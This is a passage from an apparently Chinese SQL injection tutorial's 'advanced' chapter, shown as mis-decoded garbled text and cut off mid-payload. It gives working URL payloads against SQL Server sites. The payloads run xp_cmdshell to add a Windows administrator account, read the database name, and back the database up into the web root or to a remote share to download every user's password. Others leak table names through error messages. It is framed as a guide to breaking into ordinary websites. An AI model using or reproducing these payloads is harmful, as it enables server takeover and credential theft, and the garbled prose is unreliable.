SQL×¢Èë½Ì³ÌÖ®¸ß¼¶Æª

¿´ÍêÈëÃÅƪºÍ½ø½×ƪºó£¬ÉÔ¼ÓÁ·Ï°£¬ÆƽâÒ»°ãµÄÍøÕ¾ÊÇûÎÊÌâÁË¡£µ«Èç¹ûÅöµ½±íÃûÁÐÃû²Â²»µ½£¬»ò³ÌÐò×÷Õß¹ýÂËÁËһЩÌØÊâ×Ö·û£¬ÔõôÌá¸ß×¢ÈëµÄ³É¹¦ÂÊ£¿ÔõôÑùÌá¸ß²Â½âЧÂÊ£¿Çë´ó¼Ò½Ó×ÅÍùÏ¿´¸ß¼¶Æª¡£
µÚÒ»½Ú¡¢ÀûÓÃϵͳ±í×¢ÈëSQLServerÊý¾Ý¿â
SQLServerÊÇÒ»¸ö¹¦ÄÜÇ¿´óµÄÊý¾Ý¿âϵͳ£¬Óë²Ù×÷ϵͳҲÓнôÃܵÄÁªÏµ£¬Õâ¸ø¿ª·¢Õß´øÀ´Á˺ܴóµÄ·½±ã£¬µ«ÁíÒ»·½Ã棬ҲΪעÈëÕßÌṩÁËÒ»¸öÌø°å£¬ÎÒÃÇÏÈÀ´¿´¿´¼¸¸ö¾ßÌåµÄÀý×Ó£º
¢Ù http://Site/url.asp?id=1;exec master..xp_cmdshell “net user name password /add”--
¡¡¡¡·ÖºÅ;ÔÚSQLServerÖбíʾ¸ô¿ªÇ°ºóÁ½¾äÓï¾ä£¬--±íʾºóÃæµÄÓï¾äΪעÊÍ£¬ËùÒÔ£¬Õâ¾äÓï¾äÔÚSQLServerÖн«±»·Ö³ÉÁ½¾äÖ´ÐУ¬ÏÈÊÇSelect³öID=1µÄ¼Ç¼£¬È»ºóÖ´Ðд洢¹ý³Ìxp_cmdshell£¬Õâ¸ö´æ´¢¹ý³ÌÓÃÓÚµ÷ÓÃϵͳÃüÁÓÚÊÇ£¬ÓÃnetÃüÁîн¨ÁËÓû§ÃûΪname¡¢ÃÜÂëΪpasswordµÄwindowsµÄÕʺţ¬½Ó×Å£º
¢Ú http://Site/url.asp?id=1;exec master..xp_cmdshell “net localgroup name administrators /add”--
¡¡¡¡½«Ð½¨µÄÕʺÅname¼ÓÈë¹ÜÀíÔ±×飬²»ÓÃÁ½·ÖÖÓ£¬ÄãÒѾ­Äõ½ÁËϵͳ×î¸ßȨÏÞ£¡µ±È»£¬ÕâÖÖ·½·¨Ö»ÊÊÓÃÓÚÓÃsaÁ¬½ÓÊý¾Ý¿âµÄÇé¿ö£¬·ñÔò£¬ÊÇûÓÐȨÏÞµ÷ÓÃxp_cmdshellµÄ¡£
¢Û http://Site/url.asp?id=1 ;;and db_name()>0
Ç°ÃæÓиöÀàËƵÄÀý×Óand user>0£¬×÷ÓÃÊÇ»ñÈ¡Á¬½ÓÓû§Ãû£¬db_name()ÊÇÁíÒ»¸öϵͳ±äÁ¿£¬·µ»ØµÄÊÇÁ¬½ÓµÄÊý¾Ý¿âÃû¡£
¢Ü http://Site/url.asp?id=1;backup database Êý¾Ý¿âÃû to disk=’c:\inetpub\wwwroot\1.db’;--
ÕâÊÇÏ൱ºÝµÄÒ»ÕУ¬´Ó¢ÛÄõ½µÄÊý¾Ý¿âÃû£¬¼ÓÉÏijЩIIS³ö´í±©Â¶³öµÄ¾ø¶Ô·¾¶£¬½«Êý¾Ý¿â±¸·Ýµ½WebĿ¼ÏÂÃ棬ÔÙÓÃHTTP°ÑÕû¸öÊý¾Ý¿â¾ÍÍêÍêÕûÕûµÄÏÂÔØ»ØÀ´£¬ËùÓеĹÜÀíÔ±¼°Óû§ÃÜÂ붼һÀÀÎÞÒÅ£¡ÔÚ²»ÖªµÀ¾ø¶Ô·¾¶µÄʱºò£¬»¹¿ÉÒÔ±¸·Ýµ½ÍøÂçµØÖ·µÄ·½·¨£¨Èç\\202.96.xx.xx\Share\1.db£©£¬µ«³É¹¦Âʲ»¸ß¡£
¢Ý http://Site/url.asp?id=1 ;;and (Select Top 1 name from sysobjects where xtype=’U’ and status>0)>0
Ç°Ãæ˵¹ý£¬sysobjectsÊÇSQLServerµÄϵͳ±í£¬´æ´¢×ÅËùÓеıíÃû¡¢ÊÓͼ¡¢Ô¼Êø¼°ÆäËü¶ÔÏó£¬xtype=’U’ and status>0£¬±íʾÓû§½¨Á¢µÄ±íÃû£¬ÉÏÃæµÄÓï¾ä½«µÚÒ»¸ö±íÃûÈ¡³ö£¬Óë0±È½Ï´óС£¬Èñ¨´íÐÅÏ¢°Ñ±íÃû±©Â¶³öÀ´¡£µÚ¶þ¡¢µÚÈý¸ö±íÃûÔõô»ñÈ¡£¿»¹ÊÇÁô¸øÎÒÃÇ´ÏÃ÷µÄ¶ÁÕß˼¿¼°É¡£
¢Þ http://Site/url.asp?id=1 ;;and (Select Top 1 col_name(object_id(&ls